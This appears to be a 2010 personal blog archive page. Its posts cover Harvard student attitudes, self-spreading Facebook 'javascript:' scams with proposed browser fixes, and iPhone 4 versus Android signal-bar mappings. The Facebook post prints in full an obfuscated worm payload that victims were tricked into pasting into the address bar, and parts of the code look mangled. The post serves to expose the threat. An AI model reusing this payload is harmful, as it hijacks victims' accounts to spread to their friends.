2010-07-23

Why Harvard Students are successful; dealing with Harvard Karma Envy

I just tweeted:

@MetaLev: The Social Network http://goo.gl/rarh looks semi-interesting, Zuck well-casted, but actors look more like Hollywood than Harvard

I immediately got the following response:

@positiveneuro: I think our different reactions to the social network are so interesting! I'm electrified by it! You're so humdrum about it! I wonder if it's because Harvard is not a land of mystique for you--it's your daily. For better or worse, the whole meme of Harvard seduces me.

(I take classes at Harvard and attend MIT.)  I posted the following reply, which I thought was worth reposting here, because I think I learned something by tweeting it:

@MetaLev: Harvard seduced me too until I went to take classes there, and realized everyone is pretty normal.  Normal but with an edge that I would best describe as a tendency to choose to thrive. They're a bit more enthusiastic and excited about possibilities and opportunities than the average person. That is all. Although that's a big "all", it has remarkable consequences. I hope this is teachable, I want my kids to take this approach to life.

and, because karma envy is relevant to any discussion about Harvard, here's some more of the conversation:


@positiveneuro: That's really insightful re:differences about Harvard kids, Luke. That's GOT to be a conditioned attitude. A friend's comment to me: "I think you reacted so strongly to the preview because you want to be a mark zuckerberg"

@MetaLev: Yeah -- karma envy :-) Be your own MZ.


@positiveneuro: I can't remember if we've discussed this principle from the bhagavad gita or not: it is better to live your own destiny imperfectly than to live someone else's destiny perfectly

@MetaLev: Hmm. You could also say it's better to live your own destiny perfectly than someone else's imperfectly.  You probably won't be the next Mark Zuckerberg, you'd be imperfect at it if you tried. But he will never be the perfect you either.

2010-07-22

Stupid Facebook Javascript Viruses



"Sarah liked GIRLS ARE UNABLE TO STARE AT THIS FOR 10 SECONDS, BUT GUYS CAN on Facebook and suggested you like it too."

I get up to two invitations per week on facebook from friends to view some page that promises to show me something amazing/shocking/titillating. These are usually sent by friends who I doubt intended to send me these invitations, and inevitably they are links to facebook pages that tell me to paste some javascript code into the addressbar to view the advertised page. Of course if you do as you're told to do, then all your friends are automatically emailed an invitation to view the page -- without your knowledge.

A surprising number of people have been falling for this attack -- probably in the millions because facebook has 500M users and a good number of my own fb friends have fallen for this. Someday I'm sure I'll get an invitation from someone that they'll be very embarrassed about -- because it is something they never would have sent, but the fact I got it indicates that they opened the link themselves...

I'm having a very hard time getting browser vendors to take this combination of cross-site scripting (XSS) and social engineering seriously :( It's rather ridiculous that both the addressbar and the bookmarks bar (via bookmarklets) will happily execute Javascript code without warning the user or enforcing any sort of constraints on security context!


The WHATWG mailing list thread I started about this: Please disallow "javascript:" URLs in browser address bars

I filed bug reports for Chromium, but unfortunately the bug reports are security-related so you probably can't see them unless you're a Chromium developer: http://code.google.com/p/chromium/issues/detail?id=44796 ; http://code.google.com/p/chromium/issues/detail?id=49995 ; http://code.google.com/p/chromium/issues/detail?id=33304
UPDATE: Firefox has a related bug:  https://bugzilla.mozilla.org/show_bug.cgi?id=305692

All bugs have been closed as WONTFIX, and the WHATWG mailing list (the only list that most of the browser vendors subscribe to, with the exception of MS of course) doesn't really want to fix this.

Here are my suggestions from the latest bug report for how to fix this:

When you install a .crx extension, you are warned about the security implications of doing so.  However if you drag a "javascript:" bookmarklet to the bookmarks bar, you are not given a security warning -- however bookmarklets have access to the security context of whatever page is currently open when they are clicked.  For that reason, the bookmarklets system is vulnerable to exploitation via social engineering, and literally millions of facebook friends lists have been hacked this way by self-propagating js viruses.
 
Also, having a user paste javascript: URLs into the address bar is already heavily exploited by facebook viruses to spread like wildfire by auto-sending themselves to all your fb friends.
 
Proposed solutions:
 
(1) The same warning should be given when dragging bookmarklets to the addressbar as is given when installing .crx extensions.
 
(2) Chrome's anti-phishing system should be used to check where bookmarklets have originated (if dragged/dropped), and sites like facebook.com should be blacklisted for javascript:* bookmarklets (*not* for javascript:* URLs that are clicked on, just for URLs dragged to the addressbar).
 
(3) Javascript that has no known origin (that is typed directly into the URL bar) should either be disabled by default (re-enablable via debug option, for the tiny 0.0001% of users that need this functionality), or at the very least and less preferably, the user should be given a security warning when hitting Enter after entering such a URL.  There is no legitimate reason for the other 99.9999% of users to need to enter javascript URLs into the addressbar.

Given the success of these exploits so far on facebook, the use and nefariousness of them will likely only increase.


Here's an example of the sort of javascript employed -- e.g. this one is from a page entitled "World's Hardest Riddle" and has you type Ctrl-C, Alt-D, Ctrl-V and then Enter to reveal the riddle (i.e. to copy all this into the addressbar): anyone care to disentangle what this is doing?

javascript:(function(){a='app107450945963197_jop';b='app107450945963197_jode';
ifc='app107450945963197_ifc';ifo='app107450945963197_ifo';mw='app1074509459631
97_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c
(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(
/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=funct
ion(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i
\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k
\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f
\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h
","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q
\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f
\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g
\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l
\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c
);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2
]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6
C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTim
eout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x4
4|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

2010-07-03

Android vs iPhone 4 signal strength display (FWIW)

In the light of the iPhone 4 Grip of Death fiasco, AnandTech reverse-engineered the signal-strength-to-bars mapping for the iPhone 4.  Tim Bray tweeted "Interested in signal-bar calculations? Android is open source, check updateSignalStrength() in http://is.gd/dd2Kh".  I used this source, combined with the 3GPP spec referenced in the Android source (thanks to @tweakt for the link) to produce the following graph comparing signal strength indicators on Android and the iPhone 4.

I want to stress that since the number of bars displayed for a given signal strength is just a subjective way of presenting signal strength info to the user, so this graph is only presented for what it's worth -- don't read too much into it or get hung up on the details :-)  (As pointed out in the comment below, "for all the millions of dollars in lost productivity spent discussing 'bars'...")


Observations:
  • The iPhone 4 consistently displays a greater percentage signal strength than Android (as defined by the fraction of bars lit).  However the signal-strength-to-bars mapping is not regulated or defined anywhere, other than the fact that Apple said in their open letter that AT&T recently came up with their own recommendation for this mapping on their own network.  Nothing necessarily says Android is more "right" than Apple.
  • Both Android and the iPhone 4 display the maximum number of bars (5/5 on iPhone, 4/4 on Android) for over half the usable signal strength range (as measured on the dBm scale).  The implication of this is probably that it's common industry practice to show full bars whenever the signal is strong enough that there are no real or noticeable connection problems.  So Apple may be inflating their signal strength status slightly for weaker signals in order to make it look like the iPhone 4 has excellent reception, but at least the practice of reporting full bars at -90dBm or greater appears to be the norm (based on these two data points), even though there's still a lot of signal strength headroom above that level.
  • Assuming AnandTech's measurements are accurate, it's possible to come to the conclusion that the Apple signal strength numbers appear manually fudged, accidentally or otherwise: note the short dBm range for 3 bars and the extra-long dBm range for 4 bars.  In other words the iPhone reports 4 bars at a much lower signal strength than it should relative to the other thresholds, the chosen thresholds don't follow a smooth curve.
  • The iPhone 4 is generally overreporting the number of bars relative to Android for lower signal strengths (under -101dBm or so), but is about in line with Android for the highest signal strengths (over -97dBm).  Assuming that a good set of thresholds were chosen in the Android source, and assuming that the radio in an average Android device and the radio in the iPhone 4 have similar characteristics, this supports Apple's point in their letter that weak signals were previously given too many bars.  (Note however that the 3GPP standard only reports signal strength at 2dBm intervals, so selecting thresholds is not exactly a precise science, and the Android numbers are probably chosen somewhat arbitrarily too...)
  • It's hard to say what mapping Apple will have to use to make it look like the Grip of Death isn't an issue on the iPhone, but based on AnandTech's testing the attenuation is high enough that they won't be able to hide it entirely.
  • Note that the Nexus One suffers from a similar problem to the iPhone 4, you can easily lose 3G reception if you grip the phone along the metal strip at the back.
Update: The comparison is made murkier by the fact that AT&T uses WCDMA for their 3G data connection and T-Mobile and other GSM carriers use standard GSM 3G standards.  The characteristics of different data transmission standards may be dissimilar as signal strength varies and across changes in environmental characteristics such as noise levels and terrain.

Follow me on Twitter <

--

Updates:

(1) an insightful comment by xtal on Slashdot:

For all of the millions of dollars being lost on productivity aimlessly discussing 'bars'..


Can someone please dissect the antenna and then connect it to a calibrated spectrum analyser? This is so mindbogglingly trivial to do it is beginning to hurt my soul. I do similar exercises at work with new, untested antenna designs. I am sure I am not the only one.


For comparison, do the same to other phones and publish actual measurements of received signal drops and the effect from the disturbance caused from closing your hand around the antenna. This is similar to how touching an old rabbit-ears style antenna effects the picture on a analog TV broadcast, if the effect is as I suspect.

Voila! An actual, meaningful assessment of what the phone bars mean in real numbers from a calibrated instrument.

An uncalibrated receiver, such as the iphone, is not a proper tool to do this.

2010-07-02

Post updated, see new link below

This post has been superceded by a newer post illustrating the Android vs iPhone 4 signal-strength-to-bars mapping, please visit that post instead.

Signal-strength-to-bars mapping on iPhone 4

Apple released the statement today that they were "stunned to find" (could they be any more dramatic?) that the formula used to map signal strength to bars on the iPhone 4 is "totally wrong".  They state they will fix the problem by reducing the number of bars displayed for a given signal strength.

"Our formula, in many instances, mistakenly displays 2 more bars than it should for a given signal strength.  For example, we sometimes display 4 bars when we should be displaying as few as 2 bars. Users observing a drop of several bars when they grip their iPhone in a certain way are most likely in an area with very weak signal strength, but they don’t know it because we are erroneously displaying 4 or 5 bars. Their big drop in bars is because their high bars (sic) were never real in the first place (sic again)."

HOWEVER I claim that they will increase the number of bars for weak signals, and only decrease the number of bars for medium-strength signals.  Here's the reasoning:

  • The open letter implies several times that when the number of bars is low, the reading doesn't reflect the actual operability of the phone, i.e. that the low end of the bar scale is too low: "iPhone 4 can drop 4 or 5 bars when tightly held...This is a far bigger drop than normal, and as a result some have accused the iPhone 4 of having a faulty antenna design.  At the same time, we continue to read articles and receive hundreds of emails from users saying that iPhone 4 reception is better than the iPhone 3GS. They are delighted. This matches our own experience and testing...The iPhone 4's performance is the best we've ever shipped".
  • They say "To fix this, we are adopting AT&T’s recently recommended formula for calculating how many bars to display for a given signal strength", but it's impossible to believe that they'll just apply AT&T's formula without tweaking it if you also believe their claims that the iPhone 4 really is better at operating on a weak signal than previous phones -- because bars are a subjective measure of the cellphone's ability to connect over the cell network.  These two claims simply don't match up.  They'll jack up the number of bars compared to the AT&T recommendation if it really is true the iPhone 4 can get the same quality of connection on a weaker signal than previous iPhones.
  • There would be a public outcry if they just drop the signal threshold for each of the bars (a drop of 4->2 could now be 2->1 or 2->0 if they are just displaying "two more bars than we should"), or even if they just dropped the signal strength threshold of the high-numbered bars -- "I got the iOS update and now my phone has a weaker signal than ever!".  The whole problem is that people believe bars and don't understand the science or math behind the bars.
  • Apple's magic fix for previous iPhone signal strength problems was supposedly an inflation of the number of displayed bars.  (It keeps people happier.)

The great irony of all this is that it appears Apple has been caught red-handed trying to inflate their signal strength in the first place...